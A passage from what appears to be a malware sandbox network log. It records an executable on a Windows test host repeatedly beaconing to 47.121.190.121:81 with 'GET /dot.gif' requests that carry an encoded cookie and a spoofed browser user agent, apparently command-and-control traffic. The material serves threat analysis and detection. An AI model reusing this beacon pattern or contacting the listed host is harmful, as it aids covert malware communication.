              Jan 9, 2025 18:28:29.362265110 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:29 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              82 | 192.168.2.4 | 50020 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:29.482963085 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:30.463933945 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:30 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              83 | 192.168.2.4 | 50028 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:30.582952023 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:31.677527905 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:31 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              84 | 192.168.2.4 | 50035 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:31.811155081 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:32.800879002 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:32 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              85 | 192.168.2.4 | 50042 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:33.062242985 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:34.118453979 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:33 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              86 | 192.168.2.4 | 50051 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:34.234083891 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:35.329574108 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:35 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              87 | 192.168.2.4 | 50060 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:35.477564096 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:36.560506105 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:36 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              88 | 192.168.2.4 | 50068 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:36.736404896 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:37.695861101 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:37 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              89 | 192.168.2.4 | 50076 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:37.925925016 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:38.963721991 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:38 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              90 | 192.168.2.4 | 50083 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:39.143357038 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:40.162225008 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:40 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              91 | 192.168.2.4 | 50093 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:40.280900955 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:41.262742043 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:41 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              92 | 192.168.2.4 | 50094 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:41.380564928 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:42.357970953 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:42 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              93 | 192.168.2.4 | 50095 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:42.468519926 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:43.525248051 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:43 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              94192.168.2.45009647.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:43.645613909 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:44.676873922 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:44 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              95192.168.2.45009747.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:44.804044962 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:45.743275881 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:45 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              96192.168.2.45009847.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:45.990778923 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:47.011348009 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:46 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              97192.168.2.45009947.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:47.190807104 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:48.148272038 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:47 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              98192.168.2.45010047.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:48.268452883 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:49.317629099 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:49 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              99192.168.2.45010147.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:49.504554987 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              100192.168.2.45010247.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:53.409832001 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:54.443525076 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:54 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              101192.168.2.45010347.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:54.562570095 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:55.532665014 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:55 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              102192.168.2.45010447.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:55.656450987 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:56.750638008 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:56 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              103192.168.2.45010547.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:56.860140085 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:58.599596977 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:57 GMT
              Content-Type: application/octet-stream
              Content-Length: 0
              Jan 9, 2025 18:28:58.600266933 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:57 GMT
              Content-Type: application/octet-stream
              Content-Length: 0
              Jan 9, 2025 18:28:58.601686954 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:57 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              104192.168.2.45010647.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:58.723535061 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:59.666361094 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:59 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              105192.168.2.45010747.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:59.784605980 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:00.740643978 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:00 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              106192.168.2.45010847.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:00.861505985 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:01.822998047 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:01 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              107192.168.2.45010947.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:02.017900944 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:02.993954897 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:02 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              108192.168.2.45011047.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:03.108571053 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:04.080018997 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:03 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              109192.168.2.45011147.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:04.203457117 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:05.165469885 CET114INHTTP/1.1 200 OK
